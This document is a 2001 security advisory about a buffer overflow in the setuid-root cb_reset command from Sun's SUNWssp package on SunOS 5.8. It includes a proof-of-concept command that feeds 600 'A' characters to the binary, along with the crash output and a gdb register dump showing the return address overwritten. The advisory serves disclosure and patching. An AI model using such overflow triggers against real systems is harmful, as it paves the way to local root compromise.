COMMAND

    /opt/SUNWssp/bin/cb_reset

SYSTEMS AFFECTED

    SunOS 5.8 (at least)

PROBLEM

    Pablo Sor  found following.   A problem  with the  cb_reset setuid
    root command included in the SUNWssp package (not in the  standard
    install),  results  in  a  buffer  overflow  and  potentially  the
    execution of arbitraty code.  Due to the insufficient handling  of
    input  parameter,  a  buffer  overflow  at 600 characters makes it
    possible to overwrite variables on the stack including the  return
    address.   Vulnerable  packages/systems  are  SunOS  5.8 (have not
    tested on other version).

        $ uname -a
        SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
        
        $ ls /tftpboot/cb_port
        /tftpboot/cb_port
        
        $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
        Resetting host
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
        ether_hostton(SrcHost:laika): No such file or directory
        ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAA): No such file or directory
        Bus Error (core dumped)
        
        $ gdb /opt/SUNWssp/bin/cb_reset --core=core
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "sparc-sun-solaris2.8"...
        (no debugging symbols found)...
        Core was generated by `/opt/SUNWssp/bin/cb_reset
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 10, Bus Error.
        Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
        (no debugging symbols found)...done.
        Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
        Reading symbols from /opt/SUNWssp/lib/liblogger.so...
        (no debugging symbols found)...done.
        
        [...]
        
        Loaded symbols for /usr/lib/nss_files.so.1
        #0  0x1219c in cb_send_frame ()
        (gdb) info registers
        g0             0x0      0
        g1             0xff195b80       -15115392
        g2             0xff322630       -13490640
        g3             0xff332d78       -13423240
        g4             0x0      0
        g5             0x0      0
        g6             0x0      0
        g7             0x0      0
        o0             0x13278  78456
        o1             0xff1bbab8       -14959944
        o2             0xff1b8018       -14974952
        o3             0x13278  78456
        o4             0x13258  78424
        o5             0xffbedb71       -4269199
        sp             0xffbedb18       -4269288
        o7             0x1218c  74124
        l0             0xc3c3c3c3       -1010580541
        l1             0x41414141       1094795585
        l2             0x41414141       1094795585
        l3             0x41414141       1094795585
        l4             0x41414141       1094795585
        l5             0x41414141       1094795585
        l6             0x41414141       1094795585
        l7             0x41414141       1094795585
        i0             0x41414141       1094795585
        i1             0x41414141       1094795585
        i2             0x41414141       1094795585
        i3             0x41414141       1094795585
        i4             0x4141414d       1094795597
        i5             0x41414141       1094795585
        fp             0x41414141       1094795585
        i7             0x41414141       1094795585  (***)
        y              0xb      11
        psr            0xfe801001       -25161727
        wim            0x0      0
        tbr            0x0      0
        pc             0x1219c  74140
        npc            0x121a0  74144
        fpsr           0x0      0
        cpsr           0x0      0
        (gdb)

SOLUTION

    Sun  Microsystems  was  notified  on  June  12, 2001.  Patches are
    excepted shortly.